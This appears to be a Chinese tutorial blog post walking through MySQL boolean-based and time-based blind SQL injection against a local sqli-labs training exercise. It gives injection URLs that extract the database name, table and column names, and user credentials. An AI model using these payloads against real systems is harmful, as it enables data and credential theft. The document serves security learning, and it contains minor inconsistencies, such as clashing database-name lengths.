MYSQL布尔注入


MYSQL布尔注入


原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。
获取数据库名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8#

在这里插入图片描述

获取数据库名
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115#
为 ‘s’
在这里插入图片描述

依次类推得到名字为’security’
查询表数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or (select count(*) from information_schema.tables where table_schema=database())=4#
在这里插入图片描述

表数量为4
获取第一个表名的长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6#
在这里插入图片描述

为6
获取第一个表的名字
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
在这里插入图片描述

得到第一个字节为’e’
依次类推得到第一个表为’emails’
得到后几个表为
‘referers’,’users’,’ungents’

获取users字段的数据量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and (select count(*) from users)=13#
可得共有13条数据
在这里插入图片描述

获取users字段数量及长度
数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or (select count(*) from information_schema.columns where table_name=‘users’ and table_schema=database()) =3#

在这里插入图片描述

表中字段为3
获取第一个字段名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1)) =2#
获取长度为2
在这里插入图片描述

获取第一个字段名首字母为’i’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or ord(mid((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1),1,1)) =105#
在这里插入图片描述

依次得到第一个表名为id
后面表为username,password。
获取username字段的第一条数据
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select username from users limit 0,1)) =4#
长度为4
在这里插入图片描述

第一条数据第一个字母为’D’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and ord(mid((select username from users limit 0,1),1,1)) =68#
在这里插入图片描述

依次得到第一个username为Dumb
第一个password字段数据长度为 4
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select password from users limit 0,1)) =4#
在这里插入图片描述

第一条数据为与上面username对应为Dumb

后面可依次得到接下来的username和password

延时注入
通过sleep搭配if语句进行注入
适用于无回显状态
语句
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and sleep(if(length((select database()))>8,0,5))#
在大于8 的时候出现延时超过5秒现象,得到数据库名长度为5
在这里插入图片描述

接下去步骤如同布尔注入相同,只是用的函数不同

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值